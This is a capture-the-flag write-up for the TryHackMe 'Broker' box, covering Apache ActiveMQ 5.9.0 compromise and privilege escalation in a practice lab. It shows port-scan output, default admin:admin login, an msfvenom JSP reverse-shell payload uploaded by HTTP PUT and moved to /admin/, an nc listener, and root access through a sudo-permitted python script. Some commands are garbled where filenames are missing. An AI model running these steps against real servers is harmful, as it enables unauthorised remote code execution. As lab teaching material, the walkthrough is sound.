TryHackme : Broker Writeup

In this article we are going to solve another CTF challenge broker from TryHackMe. This challenge includes finding an exploit for a particular software and gaining initial access using that exploit.

TryHackme : Broker Writeup

Challenge Link :

Initial Enumeration

As usual I started with nmap scan or rustscan for faster result using the command show below.

❯ rustscan --range 0-65535 --ulimit 5000 -- -sC -sV -Pn -o nmap.txt
22/tcp    open  ssh        syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4c:75:a0:7b:43:87:70:4f:70:16:d2:3c:c4:c5:a4:e9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0E0J6enJ0afxy700qSiIX5MtF1OnZao36BxMDHd4z3X/fbRQc3WOsCzY9KsTw7RltG4bSBJGja3ppRbiLTowv+2aunR3nKPaR/Rea1NFCHPxonnYutUyqPsJIRnm+oV+hqd/rvn/BgLpdNo2bpWG1PG3gNVwmbuUqybL9XF3KoZz8gj6zZPJ+RV8yrM17R2bd1J7YgTMJBKSuKyzVQZJQHJMhdBLBOfVmF3PgajXe2Dm10xbL2rQ3Zsbbuk6hhc4Ypq1LYeZ1PA0aNuHoMzhjXlYQ3XElD5Rzr6rBo5LJr2VD2Y3mo86wyM6OZBb+B88Law3RJ4fwtjVgEoa2KX0F
|   256 f4:62:b2:ad:f8:62:a0:91:2f:0a:0e:29:1a:db:70:e4 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHyqJ0DAEyEKxeir3lNhPLTZNtDo/CfpLAKWpiSxZUd8NJIrcsNod31Tl+KSwMvNjNvW2ilD1YYxnO2A3FDApqg=
|   256 92:d2:87:7b:98:12:45:93:52:03:5e:9e:c7:18:71:d5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINqDlHwUjvqNDfhowAQHQMu7A/HVUijCXkxdkgpF/pSe
1883/tcp  open  mqtt?      syn-ack
|_mqtt-subscribe: The script encountered an error: ssl failed
8161/tcp  open  http       syn-ack Jetty 7.6.9.v20130131
|_http-favicon: Unknown favicon MD5: 05664FB0C7AFCD6436179437E31F3AA6
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: Jetty(7.6.9.v20130131)
|_http-title: Apache ActiveMQ

There is a website on port 8161 and probably the way to gain initial access, I tried to access /admin but it is protected using http basic authentication and then I thought to try some common credentials and admin:admin worked.

I found that software used is Apache ActiveMQ with version 5.9.0, So let's search for a publicly available exploit.

Apache ActiveMQ

I found the exploit which is also available in metasploit but that didn't worked so I thought to give it a try manually, you can find a detailed explanation for this exploit here.

According to the exploit we have to upload a file to /fileserver/ using PUT method but files available on /fileserver/ doesn't have execute permission so for that we have to use MOVE method to move the malicious file to /admin/ location.

So first of all we are going to find the actual path for /admin/ directory and for that I visited /fileserver/ and intercept the request using burp suite.

PUT /fileserver/%80/%80
Host: IP:8161

Response :-

HTTP/1.1 500 /opt/apache-activemq-5.9.0/webapps/fileserver// (No such file or directory)
Content-Length: 0
Server: Jetty(7.6.9.v20130131)

We have the actual path for all the files, now we have just have to upload the reverse shell in JSP format using PUT Method.

❯ msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=1234 -f raw > shell.jsp
PUT Method

But when I checked the response, it said HTTP/1.1 401 Unauthorized because I forgot to provide HTTP Basic auth credentials. So I intercepted the request again for /admin/ and in that request, I found this thing Authorization: Basic YWRtaW46YWRtaW4=

Great now we just need to use this in our PUT request so that uploading the reverse shell will not give us the previous error.


We have successfully uploaded the JSP reverse shell but we can't execute it from /fileserver/, now we have to move this shell.jsp to /admin/ directory and for that we know that  /admin/ is at /opt/apache-activemq-5.9.0/webapps/admin/.  For this we are going to use Burpsuite again.


Perfect, now we can execute shell.jsp by visiting /admin/shell.jsp and don't forget to listen on the specified port using nc to catch the reverse shell.

❯ nc -nvlp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 35848
uid=1000(activemq) gid=1000(activemq) groups=1000(activemq)

Privilege Escalation

It's time for privilege escalation, I found that we are inside a docker container so may be we need to escape from it somehow.

activemq@activemq:/opt/apache-activemq-5.9.0$ cat /proc/1/cgroup
cat /proc/1/cgroup

Umm...but that's not the case we don't have to escape from the docker to gain access to host machine because running sudo -l gives us user privileges.

Matching Defaults entries for activemq on activemq:
    env_reset, mail_badpass,

User activemq may run the following commands on activemq:
    (root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/

So I renamed the to and created a new with the following content:

activemq@activemq:/opt/apache-activemq-5.9.0$ **mv**
import os

Now running as user root gives us the root shell and also the root flag.

sudo -u root /usr/bin/python3.7 /opt/apache-activemq-5.9.0/
sudo -u root /usr/bin/python3.7 /opt/apache-activemq-5.9.0/
root@activemq:/opt/apache-activemq-5.9.0# cd /root
cd /root
root@activemq:~# ls
root@activemq:~# wc root.txt
wc root.txt
 1  1 24 root.txt

We are root now and this completed the challenge. One thing that is not clear to me, what was the need of docker? Does apache activemq needs to be run on a docker or something else? If anyone can explain then please contact me on discord cyberbot#1859.

NOTE: The awesome artwork used in this article was created by chubasan.